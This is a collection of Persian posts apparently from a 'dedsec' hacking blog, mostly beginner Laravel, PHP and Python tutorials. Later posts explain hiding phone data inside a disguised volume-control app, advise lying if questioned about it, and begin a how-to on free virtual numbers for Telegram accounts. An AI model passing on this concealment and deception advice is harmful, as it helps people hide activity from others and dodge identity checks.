  • PHP نسخه بالاتر مساوی 5.6.4
  • فعال بودن افزونه OpenSSL PHP
  • فعال بودن افزونه PDO PHP
  • فعال بودن افزونه Mbstring PHP
  • فعال بودن افزونه Tokenizer PHP
  • فعال بودن افزونه XML PHP

در سایت لاراول برای نصب فریم‌ورک لاراول توصیه شده است از Composer استفاده کنید. 

برای نصب لاراول با کامپوزر از دستور زیر استفاده کنید:

composer create-project laravel/laravel

وقتی کامند فوق را نصب کردیم با صفحه ای روبرو می‌شویم

اگر به هر دلیلی نمی‌خواهید از کامپوزر استفاده کنید می‌توانید آخرین نسخه لاراول را دانلود کنید

پس از نصب لاراول با پوشه‌های این فریم‌ورک مواجه می‌شوید که شاید برای دید اول کمی استرس آور باشند! ولی اصلا نگران نباشید در ادامه قراره به ساختار پوشه‌ها در فریم‌ورک Laravel آشنا شوید.

پوشه‌ها و فایل‌های مهم لاراول عبارتند از:

1) app -> Http -> routes.php
2) app -> Http -> Controllers
3) resources -> views
4) resources -> assets
5) public
6) vendor
7) composer.json
8) .env
9) database
10) config

1) در این فایل اطلاعات مربوط به مسیرهای نرم افزار قرار می‌گیرند.

2) در این پوشه فایل‌های اصلی برنامه که ساز و کار برنامه را معین می‌کنند قرار می‌گیرند.

3) در این پوشه پوسته نرم افزاری که در حال برنامه نویسی آن هستیم گرد هم جمع می‌شوند.

4) در این پوشه منابعی مانند فایل‌های sass یا less و یا فایل‌های جاوا اسکریپت قرار می‌گیرند.

5) در این پوشه فایل‌هایی مانند index.php و .htaccess که برای نمایش نرم افزار باید آن‌ها را اجرا کنیم گرد هم می‌آیند. فایل‌هایی مانند CSS‌ها و JavaScript‌ها را نیز می‌توانید این جا مجتمع کنید.

6) تمام کتابخانه‌های نرم افزار در این پوشه قرار می‌گیرند. از جمله laravel و symfony و monolog و دیگر کتابخانه ها.

7) برای مدیریت کتابخانه‌های موجود در لاراول از این فایل استفاده می‌شود.

8) از این فایل برای انجام پیکربندی نرم افزار خود استفاده می‌کنیم.

9) پوشه database محل قرار گیری فایل‌های مربوط به پایگاه داده است. مثلا در پوشه migrations فایل‌هایی قرار می‌گیرد که با کمک آن‌ها جداول پایگاه داده ایجاد می‌شوند.

10) این پوشه محل قرار گیری فایل‌های پیکربندی پروژه لاراول است.

نمایش Hello World در لاراول

برای ایجاد این پیام در لاراول ابتدا باید به فایل مسیریابی با آدرس app -> Http -> routes.php یک نگاهی بیندازید:

Route::get('/', function () {
    return view('welcome');
});

در قسمت سوم آموزش به صورت تفصیلی به مبحث Routing می‌پردازیم، فقط به صورت خلاصه بیان کنیم که معنای این دستور این است که وقتی کاربر صفحه / را در خواست کرد برایش صفحه نمایش welcome.blade.php را از مسیر resources -> views به نمایش در بیاورد.

محتویات فایل welcome.blade.php عبارتند از:

<!DOCTYPE html>
<html>
    <head>
        <title>Laravel</title>
        <link nolink="https://fonts.googleapis.com/css?family=Lato:100" rel="stylesheet" type="text/css">
        <style>
            .
        </style>
    </head>
    <body>
        <div class="container">
            <div class="content">
                <div class="title">Laravel 5</div>
            </div>
        </div>
    </body>
</html>

اجرا کردن پروژه‌های Laravel

برای اجرا کردن پروژه Laravel در سیستم خود دو روش دارید، اولی استفاده از ابزار artisan است و دومی  قرار دادن پروژه خود در پوشه htdocs و یا www سرور مجازی و اجرا کردن فایل index مسیر public لاراول. اگر از ابزار artisan استفاده کنید مهم نیست پروژه خود را در کجای سیستم خود قرار دهید.

برای استفاده از artisan، کامند لاین را باز کرده و مسیر پروژه لاراول را با کامند لاین باز کنید. در این مسیر دستور زیر را وارد کنید:

php artisan serve

پس از وارد کردن دستور فوق پنجره‌ای  به نمایش در می‌آید

در پنجره فوق اعلام شده است که با وارد کردن آدرس http://localhost:8000/ در مرورگر می‌توانید برنامه خود را مشاهده کنید. تا وقتی که صفحه کامند لاین باز باشد می‌توانید از این آدرس استفاده کنید و همانطور که در بالا گفته شد مهم نیست پروژه خود را کجای سیستم خود قرار داده اید، و حتی از فلش و یا هارد دیسک اکسترنال خود می‌توانید به راحتی اجرا کنید.

اگر به هر دلیلی نخواستید از روش artisan استفاده کنید می‌توانید در مرورگر خود و از مسیر دایرکتوری پروژه خود آدرس /public/index.php را در مرورگر وارد کنید. 

در فایل welcome.blade.php خط <div class="title">Laravel 5</div> را با <div class="title">Hello World! <br> I'm dedsec</div> عوض کنید. با در خواست مجدد صفحه اصلی پیغام مورد نظر را مشاهده

می‌کنید

dedsec will give you the truth

join us


فریم‌ورک لاراول سال هاست در حال توسعه است ولی در سال 2015 به شدت مورد استقبال قرار گرفت و برنامه نویسان زبان PHP را به خود مشغول کرد. این فریم‌ورک در نظر سنجی‌ها و تست‌های نرم افزاری نتایج جالبی بدست آورده است. که در شروع این نمودارها را با هم بررسی می‌کنیم.

دلیل استقبال کاربران از فریم‌ورک لاراول پایداری، قدرت، سادگی و کم بودن باگ‌های نرم افزاری است.

آقای Taylor Otwell اولین نسخه از این فریم‌ورک را در سال 2011 منتشر کرد ولی در سال 2015 بود که این فریم‌ورک به سرعت محبوب شد و مورد توجه علاقه مندان به توسعه نرم افزار قرار گرفت.

با لاراول چه برنامه‌هایی می‌توان تولید کرد؟

با لاراول هر چیزی می‌توان نوشت! از یک نرم افزار ساده برای نمایش Hello World تا یک نرم افزار بسیار حرفه‌ای و پیچیده مانند شبکه‌های اجتماعی با میلیون‌ها کاربر. در استفاده از هر فریم‌ورک دقت داشته باشید که فریم‌ورک فقط یک ابزار است که کار توسعه نرم افزار را برای شما بسیار ساده تر، سریع تر و امن تر می‌کند.

لاراول بدلیل پتانسیل‌های بالایی که دارد در اجرای هر نرم افزاری شما را یارای می‌کند و مانع سردرگمی در پروژه‌های سنگین می‌شود.

بسیاری از شرکت‌های بزرگ برای توسعه نرم افزارهای خود به لاراول روی آورده اند از این نظر یادگیری لاراول می‌تواند برای شما یک بازار کار خوب و عالی فراهم سازد.

ویژگی‌های قدرتمند لاراول

سیستم مسیریابی آسان و قدرتمند: لاراول بر اساس MVC طراحی شده است پس یکی از مهم ترین بخش هایش بخش مسیریابی است. مسیریابی به معنای آدرس دهی ساده برای انجام دهی عملیات است. مثلا شما به برنامه خود اعلام می‌کنید مسیر /blog به نمایش محتویات بلاگ نرم افزار شما اختصاص بیابد. مبحث مسیریابی خود به تنهایی مبحث پیچیده و گاهی اوقات پر ریسکی است ولی با سیستم Routing لاراول این چالش به سادگی حل شده است.

ماژولار بودن: قابلیت‌های ماژولار بودن در این فریم‌ورک، قدرت دو چندان به آن بخشیده است. این قابلیت به این معناست که تقریبا تمام بخش‌های لاراول در بسته‌های جدا مسئولیت خدمت رسانی به نرم افزار شما را بر عهده دارند. مثلا یک ماژول وظیفه ایفا کردن نقش ارتباطات با دیتابیس، و یک ماژول وظیفه نمایش لایه خروجی را انجام می‌دهد. خاصیت این بخش در اینجا مشخص می‌شود که اگر خواستیم به راحتی می‌توانید بخش مورد نظر را به یک ماژول دیگر جایگزین کنید.

داشتن ORM قدرتمند: شاید مهم ترین بخش هر فریم‌ورکی بخش ORM آن است. لاراول با استفاده از ORM‌ای به نام Eloquent بازدهی بسیار بالایی داشته است. ORM موجود در لاراول به راحتی برای پایگاه‌های داده PostgresSQL و MySQL و SQL Server و SQLite سازگار است. البته کتابخانه‌هایی برای کار با دیتابیس‌های دیگر از جمله Oracle و MongoDB نیز دارد. یکی از مزیت‌های استفاده از ORM قدرتمندی مانند Eloquent این است که در هر مرحله از توسعه نرم افزار که احساس کردید باید سیستم پایگاه داده سایت خود را عوض کنید به راحتی با انجام تنظیمات اندک به یک سیستم پایگاه داده دیگر کوچ می‌کنید. این کار در برنامه نویسی‌های Flat و بدون Framework کاری بسیار پیچیده و نیازمند مدت‌ها کار و اصلاحات فراوان در برنامه است.

تمپلیت انجین حرفه ای: لاراول از سیستم Template Engine اختصاصی Blade استفاده می‌کند. Template Engine‌ها کار طراحی صفحات HTML را برای نرم افزار شما ساده تر کرده و اصول امنیتی را به صورت پیشفرض رعایت می‌کنند. البته امکان تغییر سیستم Template Engine پیشفرض لاراول با دیگر سیستم‌ها وجود دارد که با کمی جستجو در اینترنت می‌توانید کتابخانه‌های مناسب را بیابید.

استفاده از Composer: استفاده از Composer‌ها چند سالی است در فریم‌ورک‌ها بیشتر شده است. در واقع Composer‌ها راهکاری عالی و منسجم برای بروز رسانی نرم افزارها هستند. با Composer تنها با ویرایش یک فایل ساده قادر خواهید بود آپدیت شدن تمام پکیج‌های خود را به سادگی مدیریت کنید. البته Composer برای نصب و پیاده سازی کتابخانه‌ها نیز مورد استفاده قرار می‌گیرد و به عنوان مثال برای نصب Laravel مجبورید نرم افزار Composer را روی سیستم خود نصب و با استفاده از Composer پکیج‌های لاراول را روی سیستم خود پیاده سازی کنید. از Composer‌ها نترسید چون با کمی آزمون خطا به Composer عادت می‌کنید.

ساده سازی فرایند‌های تایید هویت: فرایند تایید هویت فرایندی پیچیده است. پیاده سازی سازوکار‌های ثبت نام کاربر، تایید عضویت، ورود و خروج کاربر نیازمند تجربه و دانش در این زمینه است که لاراول با تمهیداتی که سنجیده است این بخش را بسیار ساده و ایمن کرده است.

ویژگی‌های امنیتی در لاراول: یکی از وظایف هر فریم‌ورکی کمک در توسعه نرم افزارهای ایمن است. لاراول نیز از این قاعده مستثنی نیست و دائما در حال افزایش تمهیدات امنیتی در فریم‌ورک خود است. اگر از لاراول استفاده می‌کنید تا حد زیادی از XSS ها، SQL Injection‌ها و هر نوع آسیب پذیری مرتبط با نرم افزار خود آسوده خاطر باشید. در آخرین بروز رسانی‌های لاراول حتی تعداد درخواست‌های یک Router در دقیقه نیز توسط برنامه نویس قابل تنظیم هستند.

تلفظ درست Laravel

هر چند ما در این پست و دیگر پست‌های سایت از تلفظ لاراول استفاده می‌کنیم ولی در واقع تلفظ صحیح این واژه لَرَوِل است.

dedsec will give you the truth

join us


کدهای تقلب در فریم‌ورک‌های برنامه نویسی راهکاری مناسب برای یادگیری سریع و آسان کدها هستند.

مخصوصا اگر با ساختار یک فریم‌ورک آشنا هستید و می‌خواهید کار با یک فریم‌ورک جدید را یاد بگیرید می‌توانید از کدهای تقلب استفاده کنید.

در این آدرس یک cheat sheet یا برگه تقلب برای کدهای لاراول می‌بینید.

یادگیری لاراول

اگر می‌خواهید از درست بودن کد خود مطمئن شوید، و یا این که می‌خواین خیلی سریع ببینید مثلا کوکی چطور ذخیره می‌شه از این برگه‌های تقلب استفاده کنید.

این صفحه کامل شامل کدهای مرتبط با کنسول artisan و ابزار Tinker و کدهای Controller و حتی Blade و Form‌ها می‌باشد.

dedsec will give you the truth

join us


Python را اغلب با دیگر زبان‌های تفسیر شده مانند جاوا، جاوا اسکریپت، پرل، Tcl یا SmalTalk مقایسه می‌کنند. البته مقایسه با C++ و Common Lisp و یا Schame نیز می‌تواند کارآمد باشد. در این مطلب قصد داریم Python را با زبان‌های نامبرده مقایسه کنیم.

تمرکز این مقایسات فقط بر مسائل مربوط به زبان است، هر چند انتخاب زبان برنامه‌نویسی، اغلب بستگی به محدودیت‌های دنیای واقعی مانند هزینه، موجود بودن، آموزش‌ها، سرمایه‌ یا حتی علاقه‌ی شخصی افراد دارد.

مقایسه Python با جاوا

زبان برنامه نویسی جاوا

برنامه‌های Python عموماً نسبت به برنامه‌های جاوا کندتر اجرا می‌شوند، ولی اغلب برای توسعه‌ زمان کمتری نیاز دارند. برنامه‌های Python، معمولاً سه تا پنج برابر کوتاه‌تر از برنامه‌های معادل‌شان در برنامه‌های جاوا هستند. این تفاوت می‌تواند بخاطر انواع داده‌ای سطح بالای تعبیه شده‌ی داخلی یا typing داینامیکِ Python باشد.
برای مثال، یک برنامه‌نویسِ Python برای اعلان انواع آرگومان‌ها یا متغیر‌ها وقت تلف نمی‌کند و لیست چند ریختی قدرتمندِ Python و انواعِ dictionary، جهت پشتیبانی دستوری قدرتمند، مستقیماً در زبان تعبیه شده‌اند و همیشه در برنامه‌هایِ Python استفاده می‌شوند.

بخاطرِ typing زمان اجرا، run time مربوط به python نسبت به جاوا باید سخت‌تر کار کند. برای مثال زمان ارزیابی عبارتِ a+b، ابتدا run time باید شیء‌هایِ a و b را بررسی کند تا نوع‌شان را پیدا کند، این عملیات در زمان کامپایل انجام نمی‌شوند. سپس عملیات متناسب با جمع، فراخوانی می‌شود که ممکن است یک متد overload شده توسط کاربر باشد. از طرف دیگر، جاوا، می‌تواند یک integer کارآمد یا یک نقطه اعشار اضافه را اجرا کند ولی نیاز به اعلان متغیرهایِ a و b دارد و اجازه overload کردن عملگرِ + را برای کلاس‌های تعریف شده توسط کاربر،  نمی‌دهد.

به دلایل مذکور، Python بعنوان یک زبانِ "glue" بهتر عمل می‌کند درحالی که جاوا بیش‌تر بعنوان یک زبان پیاده‌سازی سطح پایین شناخته می‌شود. در واقع، ترکیب این دو زبان با هم فوق‌العاده است. کامپوننت‌ها می‌توانند در جاوا توسعه یافته و طراحی شوند و در Python با فرم‌های برنامه ترکیب شوند؛ همچنین تا زمانی‌که طراحی کامپوننت‌ها با پیاده‌سازیِ جاوا herdened” شود، می‌توان از Python بعنوان نمونه‌ی اولیه استفاده کرد. برای پشتیبانی از چنین روشِ توسعه‌ای، یک پیاده‌سازی از Python که در حال نوشته شدن با جاوا است، در حال توسعه است و از طریق جاوا و vice versa امکان فراخوانی کدِ Pyhton را فراهم می‌آورد. در این پیاده‌سازی، سورس‌کدِ Python به بایت‌کدِ جاوا ترجمه می‌شود (به کمک کتابخانه‌ی run-time برای پشتیبانی از سمانتیکِ داینامیکِ Python).

مقایسه Python با جاوا اسکریپت

زیرمجموعه‌ی "مبتنی بر شیءِ" Python، تقریباً معادل با جاوا اسکریپت است. Python هم مثل جاوا اسکریپت (نه جاوا)، از استایلی از برنامه نویسی پشتیبانی می‌کند که از توابع و متغیرهای ساده استفاده می‌کند، بدون این‌که درگیر تعریفِ کلاس‌ها شود. به هرحال، این تمام چیزی است که در مورد جاوا اسکریپت وجود دارد. از طرف دیگر، Python از کدنویسی برنامه‌های خیلی بزرگ پشتیبانی می‌کند و از طریق استایل برنامه‌نویسیِ شیء‌گرا، که کلاس‌ها و وراثت نقش مهمی در آن بازی می‌کنند، بخوبی قابلیتِ استفاده‌ی مجدد از کد را فراهم می‌کند.

مقایسه Python و پِرل (Perl)

زبان برنامه نویسی Perl

Python و پِرل، پیش‌زمینه‌ی مشابهی دارند (اسکریپت‌نویسیِ یونیکس، که هر دو رشد خوبی در این زمینه داشته‌اند)، و از بسیاری از قابلیت‌های مشابه پشتیبانی می‌کنند ولی فلسفه‌ی آن‌ها با هم فرق می‌کند. پرل، بر پشتیبانی از اعمال مبتنی بر شیءِ پرکاربرد تأکید دارد، مثلِ داشتن عبارت‌های منظمِ تعبیه شده، پویش فایل و قابلیت‌های تولید گزارش. Python بر پشتیبانی از روش‌های برنامه‌نویسی پرکاربرد تأکید دارد، مثلِ طراحی ساختار داده و برنامه‌نویسی شیء‌گرا، و با ارائه‌ی یک نشانه‌گذاری زیبا و نه بیش‌از حد مرموز، برنامه‌نویس‌ها را به نوشتن کد‌های خوانا (و البته با قابلیت نگهداری) تشویق می‌کند. در نتیجه، Python مشابه پرل است ولی کمتر در دامنه‌ی برنامه‌ی اصلی استفاده می‌شود؛ به هر حال Python نسبت به پرل، کاربرد بیش‌تری دارد.

مقایسه Python و Tcl

Tcl هم مثلِ Python بعنوان یک زبان توسعه‌ی برنامه، بخوبی یک زبان برنامه‌نویسی مستقل کاربرد دارد. به هر حال، Tcl، که بطور معمول تمام داده‌ها را بعنوان رشته ذخیره می‌کند، از نظر ساختارهای داده‌ای ضعیف است و کدهای معمولی را کندتر از Python اجرا می‌کند. Tcl، قابلیت‌های مورد نیاز برای نوشتن برنامه‌های بزرگ مثل namespaceهای ماژولار را ندارد. بنابراین، معمولاً وقتی یک برنامه‌ی بزرگِ از Tcl استفاده می‌کند، extentionهایی دارد که با C یا C++ نوشته شده‌اند و مخصوص آن برنامه هستند.

اغلب یک برنامه‌ی معادلِ نوشته شده با Python، می‌تواند بصورتِ "pure Python" هم نوشته شود. البته، توسعه‌ی pure Python سریع‌تر از نوشتن و اشکال‌زداییِ یک کامپوننتِ C یا C++ است. گفته می‌شود که جبران کیفیت، معادل با ابزارِ TK است. Python، بعنوانِ کتابخانه‌ی کامپوننت رابط کاربری گرافیکی استاندارد، یک رابط (interface) به TK دارد.

Tcl 8.0 با ارائه‌ی کامپایلرِ بایت‌کد که در پشتیبانی از نوع داده‌ها و اضافه کردن namespaceها محدودیت دارد، مسائلِ پرسرعت را آدرس‌دهی می‌کند. به هر حال، این زبان، هنوز هم یک زبان برنامه‌نویسی دست و پا گیر است.

مقایسه Python با small talk

شاید بزرگ‌ترین تفاوت میان python و smalltalk، این باشد که دستوراتِ Python، بیش‌تر "mailstream" هستد و این امر باعث می‌شود که در زمینه‌ی آموزش برنامه‌نویسی یک سطح بالاتر باشد. Python هم مثلِ Smalltalk دارای typing و اتصال (binding) داینامیک و شی گرایی است. به هر حال، Python انواع شیء‌های تعبیه شده‌ی داخلی را از کلاس‌های تعریف شده توسط کاربر متمایز کرده و در حال حاضر اجازه‌ی ارث بری از انواع تعبیه شده‌ی داخلی را نمی‌دهد. کتابخانه‌ی استانداردِ کالکشنِ انواع داده‌ایِ Smalltalk بیش‌تر اصلاح شده، در حالی‌که کتابخانه‌ی Python برای تعامل با اینترنت و حقایقِ WWW مثل ایمیل، HTML و FTP امکانات بیش‌تری دارد.

Python در مورد محیط توسعه و توزیع کد، فلسفه‌ی متفاوتی دارد. در حالی‌که Smalltalk، تصویرِ یکپارچه‌ای از سیستم دارد که شامل هر دو محیط کاربری و برنامه‌ی کاربر می‌شود، Python هر دو ماژول‌های استاندارد و ماژول‌های کاربر را در فایل‌های منحصر به فردی که در خارج از سیستم به سادگی قابل مرتب شدن و توزیع شدن هستند، ذخیره می‌کند. نتیجه این‌که برای متصل کردن یک رابط گرافیکی (GUI) به برنامه‌ی Python، بیش‌تر از یک آپشن مورد نیاز است، در حالی‌که GUI داخل سیستم تعبیه نشده است.

مقایسه Python و C++

زبان برنامه نویسی C++

تقریباً هر چیزی که در مورد جاوا وجود دارد، در C++ هم قابل اعمال است. درحالی‌که کدِ Python، سه تا پنج برابر کوتاه‌تر از کد جاوای معادل آن است، اغلب پنج تا ده برابر کوتاه‌تر از کد معادل آن در C++ است! شواهد نشان می‌دهند که یک برنامه‌نویسِ Python می‌تواند کاری را در دو ماه تمام کند در حالی‌که دو برنامه‌نویس جاوا نمی‌توانند در یک سال هم همان کار را تمام کنند. Python در جایگاه یک زبانِ "glue" می‌درخشد و برای ترکیب کامپوننت‌های نوشته شده در C++ استفاده می‌شود. 

مقایسه Python و Common Lisp و Scheme

این زبان‌ها از لحاظِ معنا‌گراییِ داینامیک، شبیه به Python هستند، ولی از لحاظ رویکردشان نسبت به دستورات، متفاوت هستند که باعث می‌شود که مقایسه تقریبا تبدیل به یک آرگومانِ تعصبی شود: حذفِ دستورات از Lips یک مزیت است یا یک عیب؟ باید توجه داشت که قابلیت‌های درونیِ Python شبیه به Lips هستند و برنامه‌های Python می‌توانند قطعه برنامه‌ها را بسرعت ساخته و اجرا کنند. معمولاً خواص دنیای واقعی تعیین شده هستند: Common Lips بزرگ (مزیت خیلی خوبی است) است و دنیایِ Scheme بین تعداد زیادی از ورژن‌های ناسازگار تقسیم شده، در حالی‌که Python یک پیاده‌سازیِ واحد، مجانی و فشرده دارد.

dedsec will give you the truth

join us


تابع var_dump() یک تابع کاربردی برای نمایش ساختار اطلاعات است. مثال زیر را ببینید:

var_dump(2);

خروجی دستور فوق int 2 است. که بیان گر این است که ورودی این تابع یک عدد integer بوده است.

مثال زیر:

var_dump("2")

خروجی تابع فوق عبارت string '2' (length=1) که بیان گر رشته بودن ورودی تابع با طول یک است.

شاید مهم ترین کابرد تابع var_dump() استفاده به منظور بررسی آرایه هاست. مثال زیر را با هم ببینیم:

var_dump(array('1', '2'));

خروجی تابع فوق به شکل زیر است:

array (size=2)
  0 => string '1' (length=1)
  1 => string '2' (length=1)

البته می‌توان چند آرایه را نیز به تابع var_dump داد. مانند زیر:

var_dump(array('1', '2'), array('a', 'b'));

که خروجی تابع فوق به صورت زیر است:

array (size=2)
  0 => string '1' (length=1)
  1 => string '2' (length=1)
array (size=2)
  0 => string 'a' (length=1)
  1 => string 'b' (length=1)

مقایسه var_dump و print_r

همانطور که می‌دانید، تابع print_r نیز مانند var_dump برای چاپ آرایه‌ها کاربرد دارد. باید گفت print_r تنها کلید و مقدار را نمایش می‌دهد ولی var_dump اطلاعات بیشتری شامل نوع و طول را نیز نمایش می‌دهد. در نمایش object‌ها نیز var_dump اطلاعات بیشتری را به نمایش در می‌آورد. در زیر مثالی از نمایش object با هر دو تابع print_r و var_dump می‌بینیم:

$obj = (object) array('BMW', 'BENZ', 'KIA');
var_dump($obj);
print_r($obj);

خروجی به شکل زیر است:

object(stdClass)[1]
  string 'BMW' (length=3)
  string 'BENZ' (length=4)
  string 'KIA' (length=3)

stdClass Object ( [0] => BMW [1] => BENZ [2] => KIA )

مشکل نمایش نا مناسب تابع var_dump

معمولا خروجی تابع var_dump همانطور که در تصویر زیر می‌بینید رنگ بندی شده و مرتب است: 

نمایش var_dump

ولی گاهی نتیجه اجرای همین آرایه بالا به شکل نامناسب زیر نمایش داده می‌شود:

نمایش نا مناسب var_dump

دلیل این مشکل فعال نبودن وصله XDebug در تنظیمات php.ini است. برای حل این مشکل نقطه ویرگول را از اول عبارت زیر حذف کرده و Apache خود را مجددا راه اندازی کنید:

zend_extension = "C:\xampp\php\ext\php_xdebug.dll"
dedsec will give you the truth
join us

در این قسمت قصد داریم دستورات شرطی PHP را به شما آموزش دهیم. تقریبا هیچ برنامه‌ای وجود ندارد که در آن شرطی وجود نداشته باشد.

دستورات شرطی اجرای یک سری از دستورات را مشروط به یک شرط معین می‌کنند. مثلا کد زیر را ببینید:

if(5 > 2){
     echo "شرط موجود در پرانتز صحیح است";
}

در بالا با استفاده از تابع if یک شرط را بررسی کردیم. شرط 5 > 2 بررسی می‌کند که آیا 5 از 2 بزرگتر است یا خیر. اگر این مقایسه صحیح بود کدهای موجود درون کروشه متعلق به if اجرا می‌شوند. اگر کد بالا را اجرا کنید نوشته "شرط موجود در پرانتز صحیح است" نمایش داده می‌شود. مثال زیر را تست کنید:

if(5 < 2){
     echo "شرط موجود در پرانتز صحیح است";
}

اگر کد بالا را تست کنید خواهید دید در خروجی هیچ چیزی چاپ نمی‌شود.

حالا دستور if را کمی حرفه‌ای تر کنیم:

if(5 < 2){
     echo "شرط موجود در پرانتز صحیح است";
}else{
     echo "شرط موجود در پرانتز صحیح نیست";
}

دستور if فوق دو بخشی است. بخش اول که همان if است شرط درون پرانتز را چک می‌کند، اگر صحیح بود آن را اجرا می‌کند ولی اگر غلط بود به سراغ else می‌رود و آن را اجرا می‌کند. بنابراین وقتی کد بالا را تست کنید خواهید دید متن "شرط موجود در پرانتز صحیح نیست" چاپ خواهد شد.

حالا دستور if را باز کمی حرفه‌ای تر می‌کنیم:

if(5 < 2){
     echo "شرط موجود در پرانتز اول صحیح است";
}elseif(8 < 2){
     echo "شرط موجود در پرانتز دوم صحیح است";
}

دستور فوق ابتدا if را تست می‌کند، چون برقرار نبوده سراغ elseif می‌رود و شرط آن را بررسی می‌کند، اگر شرط دوم برقرار بود دستورات درون آن را اجرا می‌کند. البته در بالا بدلیل اشتباه بودن هر دو شرط هیچ چیزی در خروجی نمایش داده نمی‌شود.

مثال: به نظرتان دستور زیر چه خروجی‌ای دارد؟

<?php
$number= 9;
if($number < 2){
    echo "عدد داده شده کوچکتر از 2 است";
}elseif($number < 5){
    echo "عدد داده شده کوچکتر از 5 است";
}else{
    echo "عدد داده شده بزرگتر از 5 است";
}
?>

اگر کد فوق را در سیستم خود تست کنید خواهد دید عبارت "عدد داده شده بزرگتر از 5 است" چاپ خواهد شد. در خط 3 شرط درون پرانتز برقرار نیست، چون عدد بزرگتر از 2 است. در خط 6 نیز شرط برقرار نیست، و خط هشت بدلیل برقرار نبودن شروط فوق اجرا خواهد شد.

تابع switch case در PHP

این تابع به منظور بررسی شروط با تعداد بالا می‌باشد. در زیر مثالی می‌زنیم که بررسی کنیم متغیر $number برابر چه عددی است:

<?php
$number= 9;
switch ($number) {
    case 1:
        echo 1;
        break;
    case 2:
        echo 2;
        break;
    case 3:
        echo 3;
        break;
    case 4:
        echo 4;
        break;
    case 5:
        echo 5;
        break;
    case 6:
        echo 6;
        break;
    case 7:
        echo 7;
        break;
    case 8:
        echo 8;
        break;
    case 9:
        echo 9;
        break;
    default:
        echo "عدد وارده یا بزرگتر از 9 است یا کوچکتر از 1";
        break;
}
?>

اگر سوالی دارید در بخش نظرات با ما در میان بگذارید.

dedsec will give you the truth

join us


توی این آموزش میخوام نحوه ی مخفی کردن تمام اطلاعات گوشی

از جمله برنامه ها و تصاویر و موسیقی ها و غیره. رو آوموزش بدم که نحوه ی دسترسی به اونها فقط به عقل جن یا شایدم کسایی که این ترفند رو بلد باشن برسه :)

توی این پست ما از نرم افزار Audio Manager استفاده میکنیم که لینک دانلودش رو آخر پست قرار میدم

این نرم افزار همونطور که از اسمش مشخصه برای مدیریت صدای گوشی هستش که مثلا میتونیم صدای زنگ گوشی رو بالا ببرم و غیره.

اما توی این نرم افزار گزینه ای قرار داره که وقتی اونو لمس کنیم و چند لحظه نگه داریم وارد یه جای مخفی میشه که به ما کمک میکنه تا بتونیم تمام اطلاعاتمون رو مخفی کنیم

 

اول از همه نرم افزار رو دانلود و نصب کنید که البته پیشنهاد میکنم از سایتای دیگه دانلود کنید

چون این وب مربوط به هک و امنیت هستش و قبلا آموزش ساخت نرم افزار کنترل گوشی از راه دور رو داده بودیم که الان ممکنه بعدا اگه اتفاقی براتون بیفته فکر کنین کار ما بوده و یکسری مشکلات دیگه پیش بیاد

اما اگه اعتماد کافی رو دارین میتونین برنامه رو از پایین پست دانلود و نصب کنین

بعد از نصب طبق تصاویری که قرار میدم پیش برین

اولین صفحه ای که بعد از اجرا با اون روبرو میشید صفحه ی پایین هستش 

متن بالا به این معنی هستش که شما باید لوگویی که بهش اشاره شده رو لمس کنین و چند لحظه نگه دارین

و این پیغام برای دفعات بعدی نشون داده نمیشه.

بعد از اینکه نگه داشتین با تصویر پایین روبرو میشید که خواهم گفت چی چی هستش

توی تصویر بالا همونطور که مشخصه باید انتخاب کنیم که موقع وارد شدن چه نوع کیبوردی رو میخوایم

و اینکه دقت کنین اگه مورد اول انتخاب بشه یعنی فقط عددی و مورد دوم هم یعنی میتونیم یه چیز ترکیبی بزنیم :)

از اونجایی که من دارم پست آموزشی مینویسم پس به همون پسوورد پیشفرض پسنده میکنم و 8888 رو به عنوان رمز انتخاب میکنم

پس بعد از انتخاب و تایید پسوورد پیشفرض با تصویر پایین روبرو میشم

بعدا باید یه ایمیل بازیابی تنظیم کنیم که من ایمیلی  رو تنظیم میکنم.

بعد از تایید  یه پیغام میده و میگه که ایمیل شما تنظیم شده و شما بعدا میتونین از تنظیمات اون رو تغییر بدید.

حالا نوبت به دادن دسترسی به برنامه میرسه که ممکنه برای بعضیا نمایش داده بشه و برای بعضیا هم نه

ولی اگه با تصویر پایین روبرو شدین روی Ok کلیک کنید و دسترسیارو به برنامه بدین.

حالا کار تنظیمات تموم شده و شما با صفحه پایین روبرو میشید که باید دوباره لوگورو لمس کنین و چند لحظه نگه دارین تا ازتون رمز رو بخواد و بعد از زدن رمزتون با صفحه ی پایین روبرو میشید

اگه تصویر بالارو یه نیم نگاه بندازین متوجه میشین که این برنامه خیلی امکانات به ما میده و خیلی کارها میتونیم باهاش انجام بدیم

مثلا مخفی کردن برنامه و تصاویر و پیام ها و و و

اما دقت کنین برای مخفی کردن بعضی موارد باید گوشیتون روت شده باشه

به عنوان مثال اگه بخواین یه برنامه رو مخفی کنید ازتون دسترسی رووت میخواد

حالا کار ما تقریبا تموم شده و شما برای تست میتونین روی Music کلیک کنید و بعدش برای اینکه بهتر متوجه مخفی شدن فایلاتون بشید تمامی فایلای موسیقی رو انتخاب و روی گزینه ی Hide selected files بزنین تا اونارو توی پوشه ی مد نظرتون ذخیره کنه

حالا وقتی که به نرم افزار پخش موسیقی رو اجرا کنید میبینید که هیچ فایل صوتی پیدا نمیشه :|

پیشنهاد میکنم اگه منوی گوشیتون اجازه ایجاد پوشه میده یه پوشه ایجاد کنین و یکسری خرت و پرت مثل ماشین حساب و اینجور چیزا داخلش قرار بدین و در آخر برنامه Audio Manager رو هم توی لا به لای اون بندازین که کسی گیر نده این چیه

یا اگه هم بهتون گیر دادن.

بگین این برنامه برای تنظیم صدای گوشی هستش و سعی کنین تا آخرین لحظه ی به فنا رفتن چیزی نگین :)

دانلود برنامه Audio Manager

dedsec will give you the truth

join us


سلام به کاربران عزیز وب dedsec راستش تو گروه ها و کانالای زیادی دیدم که بعضیا اقدام به فروش شماره مجازی میکنن. گفتم تو این پست روش ساختش رو بگم تا شما هم راحت بتونین واس خودتون به طور رایگان شماره مجازی درست کنین و به راحتی باهاش وارد تلگرام یا هرجای دیگه شین.


اگه نمیدونید شماره مجازی چیه تو گوگل یه سرچ کنین راجبش، ولی در خلاصه بگم که با شماره مجازی میتونین یه اکانت جدید برا خودتون تو تلگرام و هر مسنجر دیگه درست کنین، مثل اینکه یه سیمکارت دیگه در اختیار دارین ولی با شماره خارجی. خب بریم سر اصل مطلب.

اول برای اینکار ما نیاز به برنامه تکست نو TextNow داریم که برای سیستم عامل اندرویده، که تو گوگل سرچ و دانلودش کنید، فک کنم حجمش حدودا سی و خوردهی مگابایت باشه. سعی کنید نسخه 6.35 رو دان کنید.

